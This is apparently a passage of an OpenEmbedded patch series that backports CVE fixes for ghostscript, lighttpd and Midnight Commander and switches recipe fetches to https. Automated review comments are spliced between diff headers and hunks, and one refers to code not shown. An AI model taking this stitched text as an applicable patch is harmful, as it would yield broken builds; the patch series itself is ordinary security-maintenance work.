just the command to which we pipe - since at +- the pipe_fopen(), the leading '|' has been stripped. +- */ +- code = gs_add_control_path(mem, gs_permit_file_writing, f); +- if (code < 0) +- return code; +- code = gs_add_control_path(mem, gs_permit_file_control, f); +- if (code < 0) +- return code; +- break; +- } +- if (!IS_WHITESPACE(f[i])) +- break; +- } +- code = gs_add_control_path(mem, gs_permit_file_control, fp); ++ ++ code = gs_add_control_path(mem, gs_permit_file_control, f); + if (code < 0) + return code; +- return gs_add_control_path(mem, gs_permit_file_writing, fp); ++ return gs_add_control_path(mem, gs_permit_file_writing, f); + } + + int + gs_remove_outputfile_control_path(gs_memory_t *mem, const char *fname) + { +- char *fp, f[gp_file_name_sizeof]; +- const int pipe = 124; /* ASCII code for '|' */ +- const int len = strlen(fname); +- int i, code; ++ char f[gp_file_name_sizeof]; ++ int code; + + /* Be sure the string copy will fit */ +- if (len >= gp_file_name_sizeof) ++ if (strlen(fname) >= gp_file_name_sizeof) + return gs_error_rangecheck; + strcpy(f, fname); +- fp = f; + /* Try to rewrite any %d (or similar) in the string */ +- for (i = 0; i < len; i++) { +- if (f[i] == pipe) { +- fp = &f[i + 1]; +- /* Because we potentially have to check file permissions at two levels +- for the output file (gx_device_open_output_file and the low level +- fopen API, if we're using a pipe, we have to add both the full string, +- (including the '|', and just the command to which we pipe - since at +- the pipe_fopen(), the leading '|' has been stripped. 
+- */ +- code = gs_remove_control_path(mem, gs_permit_file_writing, f); +- if (code < 0) +- return code; +- code = gs_remove_control_path(mem, gs_permit_file_control, f); +- if (code < 0) +- return code; +- break; +- } +- if (!IS_WHITESPACE(f[i])) +- break; +- } +- code = gs_remove_control_path(mem, gs_permit_file_control, fp); ++ rewrite_percent_specifiers(f); ++ ++ code = gs_remove_control_path(mem, gs_permit_file_control, f); + if (code < 0) + return code; +- return gs_remove_control_path(mem, gs_permit_file_writing, fp); ++ return gs_remove_control_path(mem, gs_permit_file_writing, f); + } + + int +-- +2.33.0 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch new file mode 100644 index 0000000000..f312f89e04 --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/CVE-2021-45949.patch 
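Review bot: The `os2_printer_fopen` change in base/gp_os2pr.c declares `const int size_t = strlen(fname);` and then uses `nlen` in the length check and in the second `memcpy`, so `nlen` is undeclared there and the new local shadows the `size_t` type. This looks carried over verbatim from the upstream commit and only affects OS/2 builds, which this recipe presumably never compiles. The line should still read `const size_t nlen = strlen(fname);`, as in the sibling `mswin_handle_fopen` and `mswin_printer_fopen` changes. Also, the oversize-name path returns `gs_error_invalidaccess` through `return_error`, while a failed `gp_validate_path` returns `gs_error_invalidfileaccess` directly; it is worth confirming against upstream that two different codes are intended. All of these functions continue outside the embedded hunks.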
@@ -0,0 +1,65 @@ +From 6643ff0cb837db3eade489ffff21e3e92eee2ae0 Mon Sep 17 00:00:00 2001 +From: Chris Liddell <chris.liddell@artifex.com> +Date: Fri, 28 Jan 2022 08:21:19 +0000 +Subject: [PATCH] [PATCH] Bug 703902: Fix op stack management in + sampled_data_continue() + +Replace pop() (which does no checking, and doesn't handle stack extension +blocks) with ref_stack_pop() which does do all that. + +We still use pop() in one case (it's faster), but we have to later use +ref_stack_pop() before calling sampled_data_sample() which also accesses the +op stack. + +Fixes: +https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=34675 + +Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=2a3129365d3bc0d4a41f107ef175920d1505d1f7] +CVE: CVE-2021-45949 +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + psi/zfsample.c | 13 ++++++++----- + 1 file changed, 8 insertions(+), 5 deletions(-) + +diff --git a/psi/zfsample.c b/psi/zfsample.c +index 0023fa4..f84671f 100644 +--- a/psi/zfsample.c ++++ b/psi/zfsample.c +@@ -534,14 +534,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p) + data_ptr[bps * i + j] = (byte)(cv >> ((bps - 1 - j) * 8)); /* MSB first */ + } + pop(num_out); /* Move op to base of result values */ +- ++ /* From here on, we have to use ref_stack_pop() rather than pop() ++ so that it handles stack extension blocks properly, before calling ++ sampled_data_sample() which also uses the op stack. ++ */ + /* Check if we are done collecting data. 
*/ + + if (increment_cube_indexes(params, penum->indexes)) { + if (stack_depth_adjust == 0) +- pop(O_STACK_PAD); /* Remove spare stack space */ ++ ref_stack_pop(&o_stack, O_STACK_PAD); /* Remove spare stack space */ + else +- pop(stack_depth_adjust - num_out); ++ ref_stack_pop(&o_stack, stack_depth_adjust - num_out); + /* Execute the closing procedure, if given */ + code = 0; + if (esp_finish_proc != 0) +@@ -554,11 +557,11 @@ sampled_data_continue(i_ctx_t *i_ctx_p) + if ((O_STACK_PAD - stack_depth_adjust) < 0) { + stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust); + check_op(stack_depth_adjust); +- pop(stack_depth_adjust); ++ ref_stack_pop(&o_stack, stack_depth_adjust); + } + else { + check_ostack(O_STACK_PAD - stack_depth_adjust); +- push(O_STACK_PAD - stack_depth_adjust); ++ ref_stack_push(&o_stack, O_STACK_PAD - stack_depth_adjust); + for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++) + make_null(op - i); + } +-- +2.17.1 + diff --git a/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch new file mode 100644 index 0000000000..722bab4ddb --- /dev/null +++ b/meta/recipes-extended/ghostscript/ghostscript/check-stack-limits-after-function-evalution.patch 
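Review bot: The header of this patch uses `Upstream-Status: Backported [...]`, as does check-stack-limits-after-function-evalution.patch later in this diff, while CVE-2021-38185.patch and the Bug-704342 patch use `Upstream-Status: Backport`. I would change both to `Upstream-Status: Backport [<url>]` so that tooling which scans patch status matches them consistently. The commit id in the URL (`2a3129365d3bc0d4a41f107ef175920d1505d1f7`) also differs from the `From` line (`6643ff0cb837db3eade489ffff21e3e92eee2ae0`), so the header should say which one is the upstream commit. In the code, `ref_stack_push(&o_stack, ...)` is followed by `make_null(op - i)` on the local `op`. Whether `op` still tracks the stack top after the switch away from `push()` cannot be confirmed from the hunk and is worth checking against upstream, since `sampled_data_continue` continues outside it.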
@@ -0,0 +1,51 @@
+From 7861fcad13c497728189feafb41cd57b5b50ea25 Mon Sep 17 00:00:00 2001
+From: Chris Liddell <chris.liddell@artifex.com>
+Date: Fri, 12 Feb 2021 10:34:23 +0000
+Subject: [PATCH] oss-fuzz 30715: Check stack limits after function evaluation.
+
+During function result sampling, after the callout to the Postscript
+interpreter, make sure there is enough stack space available before pushing
+or popping entries.
+
+In thise case, the Postscript procedure for the "function" is totally invalid
+(as a function), and leaves the op stack in an unrecoverable state (as far as
+function evaluation is concerned). We end up popping more entries off the
+stack than are available.
+
+To cope, add in stack limit checking to throw an appropriate error when this
+happens.
+
+Upstream-Status: Backported [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ psi/zfsample.c | 14 +++++++++++---
+ 1 file changed, 11 insertions(+), 3 deletions(-)
+
+diff --git a/psi/zfsample.c b/psi/zfsample.c
+index 290809405..652ae02c6 100644
+--- a/psi/zfsample.c
++++ b/psi/zfsample.c
+@@ -551,9 +551,17 @@ sampled_data_continue(i_ctx_t *i_ctx_p)
+ } else {
+ if (stack_depth_adjust) {
+ stack_depth_adjust -= num_out;
+- push(O_STACK_PAD - stack_depth_adjust);
+- for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
+- make_null(op - i);
++ if ((O_STACK_PAD - stack_depth_adjust) < 0) {
++ stack_depth_adjust = -(O_STACK_PAD - stack_depth_adjust);
++ check_op(stack_depth_adjust);
++ pop(stack_depth_adjust);
++ }
++ else {
++ check_ostack(O_STACK_PAD - stack_depth_adjust);
++ push(O_STACK_PAD - stack_depth_adjust);
++ for (i=0;i<O_STACK_PAD - stack_depth_adjust;i++)
++ make_null(op - i);
++ }
+ }
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb b/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb
index 35826c2549..958a88e968 100644
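Review bot: The patch header spells the status `Upstream-Status: Backported [...]`, while the keyword documented for OpenEmbedded patch headers is `Backport`, which is also what the lighttpd and mc patches in this series use. I would change the line to `Upstream-Status: Backport [https://git.ghostscript.com/?p=ghostpdl.git;a=patch;h=7861fcad13c497728189feafb41cd57b5b50ea25]` so that patch-status tooling, which may match on the exact keyword, classifies it correctly. CVE-2021-45949.patch carries the same spelling and wants the same one-word fix.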
--- a/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb +++ b/meta/recipes-extended/ghostscript/ghostscript_9.53.3.bb @@ -33,6 +33,9 @@ SRC_URI_BASE = "https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/d file://do-not-check-local-libpng-source.patch \ file://avoid-host-contamination.patch \ file://mkdir-p.patch \ + file://0001-Bug-704342-Include-device-specifier-strings-in-acces.patch \ + file://check-stack-limits-after-function-evalution.patch \ + file://CVE-2021-45949.patch \ " SRC_URI = "${SRC_URI_BASE} \ diff --git a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb index c51f163e9b..3b738f82e7 100644 --- a/meta/recipes-extended/go-examples/go-helloworld_0.1.bb +++ b/meta/recipes-extended/go-examples/go-helloworld_0.1.bb @@ -5,7 +5,7 @@ HOMEPAGE = "https://golang.org/" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://${COMMON_LICENSE_DIR}/MIT;md5=0835ade698e0bcf8506ecda2f7b4f302" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https" SRCREV = "46695d81d1fae905a270fb7db8a4d11a334562fe" UPSTREAM_CHECK_COMMITS = "1" diff --git a/meta/recipes-extended/iputils/iputils_s20200821.bb b/meta/recipes-extended/iputils/iputils_s20200821.bb index e43abf2629..dd541d4d48 100644 --- a/meta/recipes-extended/iputils/iputils_s20200821.bb +++ b/meta/recipes-extended/iputils/iputils_s20200821.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=55aa8c9fcad0691cef0ecd420361e390" DEPENDS = "gnutls" -SRC_URI = "git://github.com/iputils/iputils \ +SRC_URI = "git://github.com/iputils/iputils;branch=master;protocol=https \ file://0001-rarpd-rdisc-Drop-PrivateUsers.patch \ " SRCREV = "23c3782ae0c7f9c6ae59dbed8ad9204f8758542b" diff --git a/meta/recipes-extended/libaio/libaio_0.3.112.bb b/meta/recipes-extended/libaio/libaio_0.3.112.bb index b3606474a5..3892f3244e 100644 --- a/meta/recipes-extended/libaio/libaio_0.3.112.bb 
+++ b/meta/recipes-extended/libaio/libaio_0.3.112.bb @@ -5,7 +5,7 @@ HOMEPAGE = "http://lse.sourceforge.net/io/aio.html" LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=d8045f3b8f929c1cb29a1e3fd737b499" -SRC_URI = "git://pagure.io/libaio.git;protocol=https \ +SRC_URI = "git://pagure.io/libaio.git;protocol=https;branch=master \ file://00_arches.patch \ file://libaio_fix_for_mips_syscalls.patch \ file://system-linkage.patch \ diff --git a/meta/recipes-extended/libarchive/libarchive_3.5.1.bb b/meta/recipes-extended/libarchive/libarchive_3.5.3.bb index 1387b69066..92bb223784 100644 --- a/meta/recipes-extended/libarchive/libarchive_3.5.1.bb +++ b/meta/recipes-extended/libarchive/libarchive_3.5.3.bb @@ -34,7 +34,7 @@ EXTRA_OECONF += "--enable-largefile" SRC_URI = "http://libarchive.org/downloads/libarchive-${PV}.tar.gz" -SRC_URI[sha256sum] = "9015d109ec00bb9ae1a384b172bf2fc1dff41e2c66e5a9eeddf933af9db37f5a" +SRC_URI[sha256sum] = "72788e5f58d16febddfa262a5215e05fc9c79f2670f641ac039e6df44330ef51" inherit autotools update-alternatives pkgconfig diff --git a/meta/recipes-extended/libnsl/libnsl2_git.bb b/meta/recipes-extended/libnsl/libnsl2_git.bb index badb71d977..0690d4cd3b 100644 --- a/meta/recipes-extended/libnsl/libnsl2_git.bb +++ b/meta/recipes-extended/libnsl/libnsl2_git.bb @@ -14,7 +14,7 @@ PV = "1.3.0" SRCREV = "fbad7b36acaa89a54023930af70805649f962999" -SRC_URI = "git://github.com/thkukuk/libnsl \ +SRC_URI = "git://github.com/thkukuk/libnsl;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta/recipes-extended/libnss-nis/libnss-nis.bb b/meta/recipes-extended/libnss-nis/libnss-nis.bb index a1d914e871..984cc98fc2 100644 --- a/meta/recipes-extended/libnss-nis/libnss-nis.bb +++ b/meta/recipes-extended/libnss-nis/libnss-nis.bb 
@@ -17,7 +17,7 @@ PV = "3.1+git${SRCPV}" SRCREV = "062f31999b35393abf7595cb89dfc9590d5a42ad" -SRC_URI = "git://github.com/thkukuk/libnss_nis \ +SRC_URI = "git://github.com/thkukuk/libnss_nis;branch=master;protocol=https \ " S = "${WORKDIR}/git" diff --git a/meta/recipes-extended/libsolv/libsolv_0.7.17.bb b/meta/recipes-extended/libsolv/libsolv_0.7.17.bb index fa6e8a3c4d..2b5da4d932 100644 --- a/meta/recipes-extended/libsolv/libsolv_0.7.17.bb +++ b/meta/recipes-extended/libsolv/libsolv_0.7.17.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.BSD;md5=62272bd11c97396d4aaf1c41bc11f7d8" DEPENDS = "expat zlib" -SRC_URI = "git://github.com/openSUSE/libsolv.git \ +SRC_URI = "git://github.com/openSUSE/libsolv.git;branch=master;protocol=https \ " SRCREV = "4bc791c0d235eb14bfe4c5da607206bfdfa6983d" diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch new file mode 100644 index 0000000000..f4e93d1065 --- /dev/null +++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch 
@@ -0,0 +1,97 @@
+Upstream-Status: Backport
+CVE: CVE-2022-22707
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001
+From: povcfe <povcfe@qq.com>
+Date: Wed, 5 Jan 2022 11:11:09 +0000
+Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134)
+
+(thx povcfe)
+
+(edited: gstrauss)
+
+There is a potential remote denial of service in lighttpd mod_extforward
+under specific, non-default and uncommon 32-bit lighttpd mod_extforward
+configurations.
+
+Under specific, non-default and uncommon lighttpd mod_extforward
+configurations, a remote attacker can trigger a 4-byte out-of-bounds
+write of value '-1' to the stack. This is not believed to be exploitable
+in any way beyond triggering a crash of the lighttpd server on systems
+where the lighttpd server has been built 32-bit and with compiler flags
+which enable a stack canary -- gcc/clang -fstack-protector-strong or
+-fstack-protector-all, but bug not visible with only -fstack-protector.
+
+With standard lighttpd builds using -O2 optimization on 64-bit x86_64,
+this bug has not been observed to cause adverse behavior, even with
+gcc/clang -fstack-protector-strong.
+
+For the bug to be reachable, the user must be using a non-default
+lighttpd configuration which enables mod_extforward and configures
+mod_extforward to accept and parse the "Forwarded" header from a trusted
+proxy. At this time, support for RFC7239 Forwarded is not common in CDN
+providers or popular web server reverse proxies. It bears repeating that
+for the user to desire to configure lighttpd mod_extforward to accept
+"Forwarded", the user must also be using a trusted proxy (in front of
+lighttpd) which understands and actively modifies the "Forwarded" header
+sent to lighttpd.
+
+lighttpd natively supports RFC7239 "Forwarded"
+hiawatha natively supports RFC7239 "Forwarded"
+
+nginx can be manually configured to add a "Forwarded" header
+https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/
+
+A 64-bit build of lighttpd on x86_64 (not known to be affected by bug)
+in front of another 32-bit lighttpd will detect and reject a malicious
+"Forwarded" request header, thereby thwarting an attempt to trigger
+this bug in an upstream 32-bit lighttpd.
+
+The following servers currently do not natively support RFC7239 Forwarded:
+nginx
+apache2
+caddy
+node.js
+haproxy
+squid
+varnish-cache
+litespeed
+
+Given the general dearth of support for RFC7239 Forwarded in popular
+CDNs and web server reverse proxies, and given the prerequisites in
+lighttpd mod_extforward needed to reach this bug, the number of lighttpd
+servers vulnerable to this bug is estimated to be vanishingly small.
+Large systems using reverse proxies are likely running 64-bit lighttpd,
+which is not known to be adversely affected by this bug.
+
+In the future, it is desirable for more servers to implement RFC7239
+Forwarded. lighttpd developers would like to thank povcfe for reporting
+this bug so that it can be fixed before more CDNs and web servers
+implement RFC7239 Forwarded.
+
+x-ref:
+ "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1"
+ https://redmine.lighttpd.net/issues/3134
+ (not yet written or published)
+ CVE-2022-22707
+---
+ src/mod_extforward.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mod_extforward.c b/src/mod_extforward.c
+index ba957e04..fdaef7f6 100644
+--- a/src/mod_extforward.c
++++ b/src/mod_extforward.c
+@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c
+ while (s[i] == ' ' || s[i] == '\t') ++i;
+ if (s[i] == ';') { ++i; continue; }
+ if (s[i] == ',') {
+- if (j >= (int)(sizeof(offsets)/sizeof(int))) break;
++ if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break;
+ offsets[++j] = -1; /*("offset" separating params from next proxy)*/
+ ++i;
+ continue;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.59.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.59.bb
index cf7f478915..73443f77b4 100644
--- a/meta/recipes-extended/lighttpd/lighttpd_1.4.59.bb
+++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.59.bb
@@ -14,6 +14,7 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \
 lighttpd-module-accesslog"
 SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \
+ file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \
 file://index.html.lighttpd \
 file://lighttpd.conf \
 file://lighttpd \
diff --git a/meta/recipes-extended/ltp/ltp_20210121.bb b/meta/recipes-extended/ltp/ltp_20210121.bb
index 17adbf43f0..e816244f8c 100644
--- a/meta/recipes-extended/ltp/ltp_20210121.bb
+++ b/meta/recipes-extended/ltp/ltp_20210121.bb
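Review bot: The new bound `(int)(sizeof(offsets)/sizeof(int))-1` is right for the pre-increment store `offsets[++j] = -1`, but nothing on the line says why the `-1` is there, which is the detail the old check got wrong. I would add a comment above the check, `/* ++j below writes offsets[j+1]; stop while that index is still inside the array */`. The `break` leaves the parse loop silently and the code that follows is outside the hunk, so it is worth confirming that a Forwarded header with more elements than `offsets` can hold is rejected rather than evaluated on the truncated list. The patch header's `Upstream-Status: Backport` also lacks the bracketed upstream commit reference that the ghostscript and mc patches in this series carry.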
@@ -33,7 +33,7 @@ SRCREV = "4d005621edd109d119627eb9210b224a63bf22cb" PR = "r4" HASHEQUIV_HASH_VERSION .= ".4" -SRC_URI = "git://github.com/linux-test-project/ltp.git \ +SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \ file://0001-build-Add-option-to-select-libc-implementation.patch \ file://0007-Fix-test_proc_kill-hanging.patch \ file://0001-Add-more-musl-exclusions.patch \ diff --git a/meta/recipes-extended/mc/files/0001-Ticket-4200-fix-FTBFS-with-ncurses-build-with-disabl.patch b/meta/recipes-extended/mc/files/0001-Ticket-4200-fix-FTBFS-with-ncurses-build-with-disabl.patch new file mode 100644 index 0000000000..408473664f --- /dev/null +++ b/meta/recipes-extended/mc/files/0001-Ticket-4200-fix-FTBFS-with-ncurses-build-with-disabl.patch 
@@ -0,0 +1,87 @@ +From e7bbf72544ab62db9c92bfe7bd1155227e78c621 Mon Sep 17 00:00:00 2001 +From: Andrew Borodin <aborodin@vmail.ru> +Date: Sat, 28 Aug 2021 11:46:53 +0300 +Subject: [PATCH] Ticket #4200: fix FTBFS with ncurses build with + --disable-widec. + +Upstream-Status: Accepted [https://github.com/MidnightCommander/mc/commit/e7bbf72544] +Signed-off-by: Andrew Borodin <aborodin@vmail.ru> +--- + lib/tty/tty-ncurses.c | 8 ++++++++ + lib/tty/tty-ncurses.h | 5 +++++ + lib/tty/tty-slang.h | 2 ++ + src/filemanager/boxes.c | 2 ++ + 4 files changed, 17 insertions(+) + +diff --git a/lib/tty/tty-ncurses.c b/lib/tty/tty-ncurses.c +index f619c0a7bf31..13058a624208 100644 +--- a/lib/tty/tty-ncurses.c ++++ b/lib/tty/tty-ncurses.c +@@ -560,6 +560,7 @@ tty_fill_region (int y, int x, int rows, int cols, unsigned char ch) + void + tty_colorize_area (int y, int x, int rows, int cols, int color) + { ++#ifdef ENABLE_SHADOWS + cchar_t *ctext; + wchar_t wch[10]; /* TODO not sure if the length is correct */ + attr_t attrs; +@@ -585,6 +586,13 @@ tty_colorize_area (int y, int x, int rows, int cols, int color) + } + + g_free (ctext); ++#else ++ (void) y; ++ (void) x; ++ (void) rows; ++ (void) cols; ++ (void) color; ++#endif /* ENABLE_SHADOWS */ + } + + /* --------------------------------------------------------------------------------------------- */ +diff --git a/lib/tty/tty-ncurses.h b/lib/tty/tty-ncurses.h +index d75df9533ab9..8feb17ccd045 100644 +--- a/lib/tty/tty-ncurses.h ++++ b/lib/tty/tty-ncurses.h +@@ -30,6 +30,11 @@ + #define NCURSES_CONST const + #endif + ++/* do not draw shadows if NCurses is built with --disable-widec */ ++#if defined(NCURSES_WIDECHAR) && NCURSES_WIDECHAR ++#define ENABLE_SHADOWS 1 ++#endif ++ + /*** typedefs(not structures) and defined constants **********************************************/ + + /*** enums ***************************************************************************************/ +diff --git a/lib/tty/tty-slang.h b/lib/tty/tty-slang.h +index 
5b12c6512853..eeaade388af4 100644 +--- a/lib/tty/tty-slang.h ++++ b/lib/tty/tty-slang.h +@@ -23,6 +23,8 @@ + #define COLS SLtt_Screen_Cols + #define LINES SLtt_Screen_Rows + ++#define ENABLE_SHADOWS 1 ++ + /*** enums ***************************************************************************************/ + + enum +diff --git a/src/filemanager/boxes.c b/src/filemanager/boxes.c +index 3eb525be4a9b..98df5ff2ed9a 100644 +--- a/src/filemanager/boxes.c ++++ b/src/filemanager/boxes.c +@@ -280,7 +280,9 @@ appearance_box_callback (Widget * w, Widget * sender, widget_msg_t msg, int parm + switch (msg) + { + case MSG_INIT: ++#ifdef ENABLE_SHADOWS + if (!tty_use_colors ()) ++#endif + { + Widget *shadow; + +-- +2.34.1 + diff --git a/meta/recipes-extended/mc/files/CVE-2021-36370.patch b/meta/recipes-extended/mc/files/CVE-2021-36370.patch new file mode 100644 index 0000000000..d6a26871bd --- /dev/null +++ b/meta/recipes-extended/mc/files/CVE-2021-36370.patch 
@@ -0,0 +1,609 @@ +Backport patch to fix CVE-2021-36370. + +Upstream-Status: Backport [https://github.com/MidnightCommander/mc/commit/9235d3c] +CVE: CVE-2021-36370 + +Signed-off-by: Kai Kang <kai.kang@windriver.com> + +From 9235d3c232d13ad7f973346077c9cf2eaa77dc5f Mon Sep 17 00:00:00 2001 +From: Andrew Borodin <aborodin@vmail.ru> +Date: Mon, 12 Jul 2021 08:48:18 +0300 +Subject: [PATCH] SFTPFS: verify server fingerprint (fix CVE-2021-36370). + +Use ~/.ssh/known_hosts file to verify server fingerprint +using ssh way: + +$ ssh localhost +The authenticity of host 'localhost (127.0.0.1)' can't be established. +ED25519 key fingerprint is SHA256:FzqKTNTroFuNUj1wUzSeV2x/1lpcESnT0ZRCmq5H6o8. +Are you sure you want to continue connecting (yes/no)? no +ssh: Host key verification failed. + +$ ssh localhost +The authenticity of host 'localhost (127.0.0.1)' can't be established. +ED25519 key fingerprint is SHA256:FzqKTNTroFuNUj1wUzSeV2x/1lpcESnT0ZRCmq5H6o8. +Are you sure you want to continue connecting (yes/no)? yes +Warning: Permanently added 'localhost' (ED25519) to the list of known hosts. +andrew@localhost's password: + +Thanks the Curl project for the used code. + +Signed-off-by: Andrew Borodin <aborodin@vmail.ru> +Signed-off-by: Yury V. Zaytsev <yury.zaytsev@moneymeets.com> +--- + doc/man/mc.1.in | 15 ++ + doc/man/ru/mc.1.in | 14 ++ + src/vfs/sftpfs/connection.c | 428 +++++++++++++++++++++++++++++++++++- + src/vfs/sftpfs/internal.h | 5 +- + 4 files changed, 452 insertions(+), 10 deletions(-) + +diff --git a/doc/man/mc.1.in b/doc/man/mc.1.in +index c0c06e32f7..7a3d118384 100644 +--- a/doc/man/mc.1.in ++++ b/doc/man/mc.1.in +@@ -3364,6 +3364,21 @@ Examples: + sftp://joe@noncompressed.ssh.edu/private + sftp://joe@somehost.ssh.edu:2222/private + .fi ++.PP ++When establishing the connection, server key fingerprint is verified using ++the ~/.ssh/known_hosts file. If the host/key pair is not found or the host is found, ++but the key doesn't match, an appropriate message is shown. 
++There are three buttons in the message dialog: ++.PP ++.B [Yes] ++add new host/key pair to the ~/.ssh/known_hosts file and continue. ++.PP ++.B [Ignore] ++do not add new host/key pair to the ~/.ssh/known_hosts file, but continue ++nevertheless (at you own risk). ++.PP ++.B [No] ++abort connection. + .\"NODE " Undelete File System" + .SH " Undelete File System" + On Linux systems, if you asked configure to use the ext2fs undelete +diff --git a/doc/man/ru/mc.1.in b/doc/man/ru/mc.1.in +index 7609da1127..bc0c1810a9 100644 +--- a/doc/man/ru/mc.1.in ++++ b/doc/man/ru/mc.1.in +@@ -3874,6 +3874,20 @@ bash\-совместимая оболочка shell. + sftp://joe@noncompressed.ssh.edu/private + sftp://joe@somehost.ssh.edu:2222/private + .fi ++При установлении соединения происходит проверка ключа сервера с использованием ++файла ~/.ssh/known_hosts file. Если пара сервер/ключ в этом файле не найдена ++или сервер найден, но ключ не соответствует, пользователю показывается ++окно с соответствующим сообщением, содержащее три кнопки: ++.PP ++.B [Да] ++добавить новую пару сервер/ключ в файл ~/.ssh/known_hosts и продолжить соединение. ++.PP ++.B [Игнорировать] ++не добавлять новую пару сервер/ключ в файл ~/.ssh/known_hosts и всё равно ++продолжить соединение (на свой страх и риск). ++.PP ++.B [Нет] ++прервать соединение. 
+ .\"NODE " Undelete File System" + .SH " Файловая система UFS (Undelete File System)" + В ОС Linux можно сконфигурировать файловую систему ext2fs, используемую +diff --git a/src/vfs/sftpfs/connection.c b/src/vfs/sftpfs/connection.c +index 9f8ea5633b..acd5026515 100644 +--- a/src/vfs/sftpfs/connection.c ++++ b/src/vfs/sftpfs/connection.c +@@ -42,6 +42,8 @@ + #include "lib/util.h" + #include "lib/tty/tty.h" /* tty_enable_interrupt_key () */ + #include "lib/vfs/utilvfs.h" ++#include "lib/mcconfig.h" /* mc_config_get_home_dir () */ ++#include "lib/widget.h" /* query_dialog () */ + + #include "internal.h" + +@@ -49,10 +51,37 @@ + + /*** file scope macro definitions ****************************************************************/ + ++#define SHA1_DIGEST_LENGTH 20 ++ + /*** file scope type declarations ****************************************************************/ + + /*** file scope variables ************************************************************************/ + ++#ifdef LIBSSH2_KNOWNHOST_KEY_ED25519 ++static const char *const hostkey_method_ssh_ed25519 = "ssh-ed25519"; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_521 ++static const char *const hostkey_method_ssh_ecdsa_521 = "ecdsa-sha2-nistp521"; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_384 ++static const char *const hostkey_method_ssh_ecdsa_384 = "ecdsa-sha2-nistp384"; ++#endif ++#ifdef LIBSSH2_KNOWNHOST_KEY_ECDSA_256 ++static const char *const hostkey_method_ssh_ecdsa_256 = "ecdsa-sha2-nistp256"; ++#endif ++static const char *const hostkey_method_ssh_rsa = "ssh-rsa"; ++static const char *const hostkey_method_ssh_dss = "ssh-dss"; ++ ++/** ++ * ++ * The current implementation of know host key checking has following limitations: ++ * ++ * - Only plain-text entries are supported (`HashKnownHosts no` OpenSSH option) ++ * - Only HEX-encoded SHA1 fingerprint display is supported (`FingerprintHash` OpenSSH option) ++ * - Resolved IP addresses are *not* saved/validated along with the hostnames ++ * ++ */ ++ + 
static const char *kbi_passwd = NULL; + static const struct vfs_s_super *kbi_super = NULL; + +@@ -70,9 +99,12 @@ static const struct vfs_s_super *kbi_super = NULL; + static int + sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror) + { ++ sftpfs_super_t *sftpfs_super = SFTP_SUPER (super); + struct addrinfo hints, *res = NULL, *curr_res; + int my_socket = 0; + char port[BUF_TINY]; ++ static char address_ipv4[INET_ADDRSTRLEN]; ++ static char address_ipv6[INET6_ADDRSTRLEN]; + int e; + + mc_return_val_if_error (mcerror, LIBSSH2_INVALID_SOCKET); +@@ -120,6 +152,30 @@ sftpfs_open_socket (struct vfs_s_super *super, GError ** mcerror) + { + int save_errno; + ++ switch (curr_res->ai_addr->sa_family) ++ { ++ case AF_INET: ++ sftpfs_super->ip_address = ++ inet_ntop (AF_INET, &((struct sockaddr_in *) curr_res->ai_addr)->sin_addr, ++ address_ipv4, INET_ADDRSTRLEN); ++ break; ++ case AF_INET6: ++ sftpfs_super->ip_address = ++ inet_ntop (AF_INET6, &((struct sockaddr_in6 *) curr_res->ai_addr)->sin6_addr, ++ address_ipv6, INET6_ADDRSTRLEN); ++ break; ++ default: 